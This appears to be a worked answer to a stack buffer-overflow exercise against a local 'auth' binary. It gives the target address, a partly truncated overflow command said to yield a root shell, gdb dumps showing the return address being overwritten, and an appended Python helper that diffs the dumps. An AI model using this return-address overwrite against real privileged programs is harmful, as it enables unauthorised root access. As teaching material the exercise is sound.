a) That would be 0x40085a.

b) Done. That gives a root shell:

    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack(

In gdb, stopped at the strcpy call:

                              : 48 89 e7          mov    rdi,rsp
    => 0x000000000040082d     : e8 0e fe ff ff    call   0x400640
    (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x40 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
    --> 0x7ffe5af18c58: 0xf2 0x06 0x40 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
        0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
        0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
        0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00
    (gdb) ni
    15          hash1 = crypt(password,"$6$1122334455667788$");
    => 0x0000000000400832     : be 24 09 40 00    mov    esi,0x400924
       0x0000000000400837     : 48 89 e7          mov    rdi,rsp
       0x000000000040083a     : e8 41 fe ff ff    call   0x400680
    (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
    --> 0x7ffe5af18c58: 0x5a 0x08 0x40 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
        0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
        0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
        0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
        0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00

The relevant line is marked with -->. Before the strcpy, the correct return address is there. After it, there is our own address.
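Added example, not part of the original answer: a small Python helper that parses the two `x /64bx ($rsp+256)` dumps above into little-endian 64-bit slots and reports which slots changed across the strcpy and how far each lies from rsp. The 0x400000-0x401000 text range used to label a code pointer is an assumption about this small non-PIE binary.

```python
import re
import struct

# Constructed from the first four lines of each dump shown above.
BEFORE = """
0x7ffe5af18c50: 0x40 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00
0x7ffe5af18c58: 0xf2 0x06 0x40 0x00 0x00 0x00 0x00 0x00
0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
"""
AFTER = """
0x7ffe5af18c50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0x7ffe5af18c58: 0x5a 0x08 0x40 0x00 0x00 0x00 0x00 0x00
0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00
"""
RSP = 0x7ffe5af18c50 - 256  # both dumps start at $rsp+256

LINE_RE = re.compile(r"^(0x[0-9a-f]+):\s*((?:0x[0-9a-f]{2}\s*)+)$")

def parse_dump(text):
    """Map each 8-byte-aligned slot address to its little-endian u64 value."""
    slots = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        raw = bytes(int(b, 16) for b in m.group(2).split())
        for off in range(0, len(raw) - len(raw) % 8, 8):
            slots[addr + off] = struct.unpack("<Q", raw[off:off + 8])[0]
    return slots

def diff_dumps(before, after):
    """Return {addr: (old, new)} for every slot whose value changed."""
    b, a = parse_dump(before), parse_dump(after)
    return {k: (b[k], a[k]) for k in sorted(b) if k in a and b[k] != a[k]}

def describe(addr, old, new, rsp=RSP, text=(0x400000, 0x401000)):
    """Label a changed slot by its offset from rsp and what the new value is.
    The text range is an assumed bound for this non-PIE binary's code."""
    off = addr - rsp
    if new == 0x4141414141414141:
        what = "overwritten with filler bytes 'A'"
    elif text[0] <= new < text[1]:
        what = "now points into the program's .text (was 0x%x)" % old
    else:
        what = "changed to 0x%x" % new
    return "rsp+%d: %s" % (off, what)
```

Running `describe` over `diff_dumps(BEFORE, AFTER)` reports the saved rbp slot at rsp+256 filled with 'A' and the return-address slot at rsp+264 redirected from 0x4006f2 to 0x40085a, matching the two marked lines.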